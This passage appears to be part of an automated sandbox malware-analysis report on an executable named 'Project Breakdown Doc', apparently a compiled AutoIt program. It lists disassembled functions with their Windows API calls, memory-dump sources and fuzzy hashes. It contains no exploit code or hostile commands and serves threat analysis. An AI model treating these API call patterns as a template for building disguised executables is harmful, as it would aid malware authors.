                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: 3afa560c87b063493d09be128cd5cac795dbc9986db2f81f621c28eb3de37a5f
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: 72014B3604814EFBCF165F95CC018EE3F62BF69351B588625FA2C58032D636CAB1AB81
                                                  Function 00CCB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00CCB59E
                                                  • ScreenToClient.USER32(?,?), ref: 00CCB5B6
                                                  • ScreenToClient.USER32(?,?), ref: 00CCB5DA
                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CCB5F5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  • Opcode ID: 972cd97a841d3770366fad58659323a088b2cc36993287a7b388f856f7bb2a29
                                                  • Instruction ID: d7baf2c27ff12b6cbf0ad0b228373e3a65f793852863e23578ef97616731b434
                                                  • Opcode Fuzzy Hash: 972cd97a841d3770366fad58659323a088b2cc36993287a7b388f856f7bb2a29
                                                  • Instruction Fuzzy Hash: 891146B5D00209EFDB41CF99C444AEEFBB5FB08310F104166E954E3220D735AA558F50
                                                  Function 00CCB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CCB8FE
                                                  • _memset.LIBCMT ref: 00CCB90D
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D07F20,00D07F64), ref: 00CCB93C
                                                  • CloseHandle.KERNEL32 ref: 00CCB94E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  • Opcode ID: d8b06f64fcef28f03bcdb5f4cf9c184ce22ec5f8a7c053a9479df282625e53a3
                                                  • Instruction ID: 256c6076b49d287f9bed1f13e3bec26c12407a7d872bf8920e24a50b1be279eb
                                                  • Opcode Fuzzy Hash: d8b06f64fcef28f03bcdb5f4cf9c184ce22ec5f8a7c053a9479df282625e53a3
                                                  • Instruction Fuzzy Hash: 81F05EB2A483417BE2102761AC46FBB3E5CEF08354F004025FB0CDA2A2DB716D0197B8
                                                  Function 00CA6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00CA6E88
                                                    • Part of subcall function 00CA794E: _memset.LIBCMT ref: 00CA7983
                                                  • _memmove.LIBCMT ref: 00CA6EAB
                                                  • _memset.LIBCMT ref: 00CA6EB8
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00CA6EC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  • Opcode ID: 70bb90403ecf7b1872f4850668303b0e2605ad5654f7771956404d0a77777bd1
                                                  • Instruction ID: d89852b61d1b0e22a34d465f4293d45749268179331eeb52338f150822b1d16b
                                                  • Opcode Fuzzy Hash: 70bb90403ecf7b1872f4850668303b0e2605ad5654f7771956404d0a77777bd1
                                                  • Instruction Fuzzy Hash: 47F0543A104200ABCF116F55DC85F4ABB2AEF45320B088065FE085E227C731E911DBB4
                                                  Function 00CCC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C4134D
                                                    • Part of subcall function 00C412F3: SelectObject.GDI32(?,00000000), ref: 00C4135C
                                                    • Part of subcall function 00C412F3: BeginPath.GDI32(?), ref: 00C41373
                                                    • Part of subcall function 00C412F3: SelectObject.GDI32(?,00000000), ref: 00C4139C
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCC030
                                                  • LineTo.GDI32(00000000,?,?), ref: 00CCC03D
                                                  • EndPath.GDI32(00000000), ref: 00CCC04D
                                                  • StrokePath.GDI32(00000000), ref: 00CCC05B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                  • String ID:
                                                  • API String ID: 1539411459-0
                                                  • Opcode ID: 94448594c9990ecc284d9dc33075c7259a41ef09642513baaabeab80128951fa
                                                  • Instruction ID: bb488026422d83341857f41bdcb85c8501a4b7f71fc1079c8b60922029a08fdb
                                                  • Opcode Fuzzy Hash: 94448594c9990ecc284d9dc33075c7259a41ef09642513baaabeab80128951fa
                                                  • Instruction Fuzzy Hash: 22F05E31001259BBDB226F54EC0AFCE3F5ABF05711F048008FA15611E287B55662DBA5
                                                  Function 00C9A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C9A399
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C9A3AC
                                                  • GetCurrentThreadId.KERNEL32 ref: 00C9A3B3
                                                  • AttachThreadInput.USER32(00000000), ref: 00C9A3BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 2710830443-0
                                                  • Opcode ID: 8b0d3cd14df0cdbf2399db08f862353c7080625b9206366afb450cda1058551f
                                                  • Instruction ID: 38f2da07672b48766f387d1b10400a37ee2608553bbd697347156cdb5eaa22a1
                                                  • Opcode Fuzzy Hash: 8b0d3cd14df0cdbf2399db08f862353c7080625b9206366afb450cda1058551f
                                                  • Instruction Fuzzy Hash: 52E0C971545228BADB205BA2DC0DFDF7F5DFF167A1F448029F90995060C671C541DBE1
                                                  Function 00C42218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00C42231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00C4223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00C42250
                                                  • GetStockObject.GDI32(00000005), ref: 00C42258
                                                  • GetWindowDC.USER32(?,00000000), ref: 00C7C0D3
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C7C0E0
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00C7C0F9
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00C7C112
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00C7C132
                                                  • ReleaseDC.USER32(?,00000000), ref: 00C7C13D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: 0aae98e4d95f048cdc85beb82ce42f6e5f403cc518c0b95143bdccac1f93404c
                                                  • Instruction ID: 8851471869e7fef4ecadcdf22df50c25c2ea4c9b9affb643cddfc8710a96b0c7
                                                  • Opcode Fuzzy Hash: 0aae98e4d95f048cdc85beb82ce42f6e5f403cc518c0b95143bdccac1f93404c
                                                  • Instruction Fuzzy Hash: 76E03932100244EEDB215F64FC49BDC3B21EB05332F04836AFA79880E187B14A81DB11
                                                  Function 00C98C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00C98C63
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C9882E), ref: 00C98C6A
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C9882E), ref: 00C98C77
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C9882E), ref: 00C98C7E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: e7b83911673460bb12994dc54d938f40491182ad694b7be19de35ec0f4ac145e
                                                  • Instruction ID: d77fa00c1ab33e06f2ceb6ad3125f7eff48cd2f444d41fb858ba00a6a033b70b
                                                  • Opcode Fuzzy Hash: e7b83911673460bb12994dc54d938f40491182ad694b7be19de35ec0f4ac145e
                                                  • Instruction Fuzzy Hash: 3FE08676642211EBDB205FB0ED0CF5E3BADEF51B92F08486CF645CA050DA74844ACB61
                                                  Function 00C82187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 00C82187
                                                  • GetDC.USER32(00000000), ref: 00C82191
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C821B1
                                                  • ReleaseDC.USER32(?), ref: 00C821D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: 004282307b3167a579caaaddd0e28bcd7365b7800b197df56fa2a2b88c6d6d33
                                                  • Instruction ID: fb2603d938a0ee1b9e6a222efb4044cc8aa863c821a01234a38ab78f9e6fef09
                                                  • Opcode Fuzzy Hash: 004282307b3167a579caaaddd0e28bcd7365b7800b197df56fa2a2b88c6d6d33
                                                  • Instruction Fuzzy Hash: 27E0E5B5800214EFDB019F61C808B9D7BB2FB4C350F108429F95A97260CB389542AF40
                                                  Function 00C8219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDesktopWindow.USER32 ref: 00C8219B
                                                  • GetDC.USER32(00000000), ref: 00C821A5
                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C821B1
                                                  • ReleaseDC.USER32(?), ref: 00C821D2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                  • String ID:
                                                  • API String ID: 2889604237-0
                                                  • Opcode ID: dfc65f9c1bf504e4a4eb9f06f118ebe62d3d624a267cf39398334c30435c4093
                                                  • Instruction ID: f1184e2918428f25bde5a5f9a803adeb4ce6c07e6e2b17edf4b752d55d5c8f23
                                                  • Opcode Fuzzy Hash: dfc65f9c1bf504e4a4eb9f06f118ebe62d3d624a267cf39398334c30435c4093
                                                  • Instruction Fuzzy Hash: FCE012B5800204AFCB019FB0C808B9EBFF2FB4C310F108029F95AA7320CB389142AF40
                                                  Function 00C9B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00C9B981
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ContainedObject
                                                  • String ID: AutoIt3GUI$Container
                                                  • API String ID: 3565006973-3941886329
                                                  • Opcode ID: 74204454cacb7933dffe54e05bbe99d41556198503907c35ac1fab2a6cb0f8c4
                                                  • Instruction ID: f9ba1e7f048687dbc7fa42476bcbe5c59ec753f0f2246c7d28e6e094e62ace8e
                                                  • Opcode Fuzzy Hash: 74204454cacb7933dffe54e05bbe99d41556198503907c35ac1fab2a6cb0f8c4
                                                  • Instruction Fuzzy Hash: DE913970600601AFDB64DF68D988B6ABBE9FF48710F24856EF9498B291DB70ED40CB50
                                                  Function 00CAB217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C5FEC6: _wcscpy.LIBCMT ref: 00C5FEE9
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                  • __wcsnicmp.LIBCMT ref: 00CAB298
                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CAB361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                  • String ID: LPT
                                                  • API String ID: 3222508074-1350329615
                                                  • Opcode ID: f52b86de616c720b6c8e986338a82c5f625fd2be54c27eba4e33c87681bc932f
                                                  • Instruction ID: 0bc4c4c716f347b649a504c16ac7ca0a0b8572adc315b6cddf656775e4bf969c
                                                  • Opcode Fuzzy Hash: f52b86de616c720b6c8e986338a82c5f625fd2be54c27eba4e33c87681bc932f
                                                  • Instruction Fuzzy Hash: 4C61A175A00216AFCF14DF94C885EAEB7B4FF09314F14416AF916AB3A2DB70AE40DB50
                                                  Function 00C52AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNEL32(00000000), ref: 00C52AC8
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C52AE1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemorySleepStatus
                                                  • String ID: @
                                                  • API String ID: 2783356886-2766056989
                                                  • Opcode ID: 576a6015f07bbb8400f72194e3ee3e2daff1d9347ad287ae3cda24e9e13e61b1
                                                  • Instruction ID: a7c38602842b46489a63804752af3fb12f951a88e3437b91ff09c2b925aa8599
                                                  • Opcode Fuzzy Hash: 576a6015f07bbb8400f72194e3ee3e2daff1d9347ad287ae3cda24e9e13e61b1
                                                  • Instruction Fuzzy Hash: 91514672418B549BD320AF10DC86BAFBBE8FF88310F42885DF1D9411A1DB308569DB27
                                                  Function 00CA99BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C4506B: __fread_nolock.LIBCMT ref: 00C45089
                                                  • _wcscmp.LIBCMT ref: 00CA9AAE
                                                  • _wcscmp.LIBCMT ref: 00CA9AC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: FILE
                                                  • API String ID: 4029003684-3121273764
                                                  • Opcode ID: 428f84898bd5156399e014c63cad5dad05d39ffdaee14588f22c12c15b91b3c3
                                                  • Instruction ID: aeb97ac22a55bd0dd41ddf888520adde091d8685e01eae036dc574573d4cc2f1
                                                  • Opcode Fuzzy Hash: 428f84898bd5156399e014c63cad5dad05d39ffdaee14588f22c12c15b91b3c3
                                                  • Instruction Fuzzy Hash: B041D775A0061ABBDF209AA4DC86FEFB7BDEF46714F000079F904A71C1DA759A0497A1
                                                  Function 00CB2882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CB2892
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CB28C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: a0f89ac27aabb8c1155deffdd442dbc3bd456b09ecd1620e8ef5792685a1abdb
                                                  • Instruction ID: 4c89d59573d35369eb7c3f1bd3ccf058deb6de6c541f4a963eb515d08c7c81e0
                                                  • Opcode Fuzzy Hash: a0f89ac27aabb8c1155deffdd442dbc3bd456b09ecd1620e8ef5792685a1abdb
                                                  • Instruction Fuzzy Hash: C4310A71800219AFCF119FA1DC85EEEBFB9FF08350F104169F815A6166DB315A56DBA0
                                                  Function 00CC6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00CC6D86
                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CC6DC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyMove
                                                  • String ID: static
                                                  • API String ID: 2139405536-2160076837
                                                  • Opcode ID: 243e48cf3ec5a4f982f1828559da4a73763e0705c4b259c65c2f24c6caed100f
                                                  • Instruction ID: 40bfd002d043c8051ddd953fb0f2ee554a5da3652fe6174f9310bd39d1af5099
                                                  • Opcode Fuzzy Hash: 243e48cf3ec5a4f982f1828559da4a73763e0705c4b259c65c2f24c6caed100f
                                                  • Instruction Fuzzy Hash: 0F317C71200604AADB109F68CC81FFB77A9FF48724F10861DF9AA97190DA31AD92DB60
                                                  Function 00CA2D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2E00
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CA2E3B
                                                  Strings
                                                  Memory Dump Source
